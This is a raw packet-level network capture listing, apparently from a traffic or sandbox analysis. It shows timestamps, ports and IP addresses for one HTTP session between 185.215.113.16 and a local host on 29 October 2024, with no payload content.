Oct 29, 2024 06:59:26.968898058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968914032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968926907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968930006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968945026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968957901 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.968961000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968976974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968992949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.968993902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969017982 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969058990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969074965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969094038 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969099045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969115019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969130039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969136000 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969146013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969161987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969177961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969182014 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969193935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969209909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969211102 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969228029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969237089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969245911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969260931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969261885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969278097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969294071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969297886 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969310999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969326019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969331026 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969366074 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969368935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969386101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969398975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969419003 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969428062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969444036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969458103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969474077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969480991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969499111 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969501972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969516993 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969532013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969547033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969556093 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969563961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969574928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969580889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969599009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969605923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969630003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969645023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969652891 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969661951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969680071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969685078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969702959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969717979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969733000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969742060 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969749928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969763994 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969765902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969784975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969791889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969809055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969825029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969830990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969842911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969861031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969876051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969882011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969892979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969912052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969914913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969927073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969939947 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969943047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969969034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.969970942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.969985008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970000982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970004082 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970017910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970033884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970048904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970053911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970065117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970077991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970098972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970115900 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970133066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970148087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970179081 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970196009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970211983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970226049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970242023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970246077 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970257998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970266104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970268011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970276117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970290899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970303059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970307112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970323086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970325947 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970339060 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970339060 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970355988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970371962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970385075 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970388889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970406055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970426083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970431089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970443010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970448971 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970459938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970475912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970482111 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970493078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970509052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970525026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970527887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970541000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970551968 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970556974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970572948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970573902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970593929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970608950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970616102 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970624924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970653057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970664978 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970668077 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970684052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970686913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970707893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970720053 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970727921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970743895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970761061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970777988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970782042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970793962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970801115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970810890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970832109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970834970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970849991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970865011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970880985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970882893 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970905066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970909119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970921040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970937014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970952034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970957994 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970968008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.970978022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.970983982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971008062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971012115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971024990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971039057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971060991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971065044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971080065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971087933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971096992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971112967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971128941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971142054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971163988 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971168995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971185923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971200943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971204996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971218109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971234083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971239090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971251011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971266985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971278906 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971282959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971299887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971307039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971327066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971344948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971369982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971374989 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971388102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971394062 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971405029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971422911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971430063 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971438885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971462011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971463919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971481085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971497059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971513987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971515894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971530914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971535921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971549988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971565962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971570969 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971582890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971599102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971616983 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971621990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971637964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971638918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971653938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971669912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971685886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971700907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971700907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971718073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971719980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971728086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971735001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971750021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971765995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971767902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971791029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971807003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971821070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971832037 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971844912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971859932 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971868992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971885920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971888065 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971904039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971918106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971929073 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971934080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971951008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971955061 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.971966982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971983910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.971991062 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972001076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972018003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972018957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972034931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972053051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972060919 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972069979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972085953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972104073 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972104073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972124100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972131014 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972141027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972156048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972172022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972178936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972188950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972199917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972214937 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972222090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972250938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972266912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972282887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972290039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972301960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972320080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972322941 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972337008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972352982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972368002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972373009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972384930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972394943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972400904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972417116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972419024 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972436905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972451925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972460985 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972467899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972482920 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972484112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972500086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972516060 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972522974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972537041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972553015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972557068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972569942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972585917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972589970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972603083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972619057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972628117 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972635984 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972651005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972666025 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972667933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972676039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972681046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972698927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972714901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972723007 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972733021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972748995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972753048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972764969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972781897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972799063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972800970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972815037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972822905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972834110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972848892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972862959 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972866058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972882986 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972886086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972899914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972917080 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.972961903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972979069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.972992897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973009109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973022938 CET	49769	80	192.168.2.6	185.215.113.16
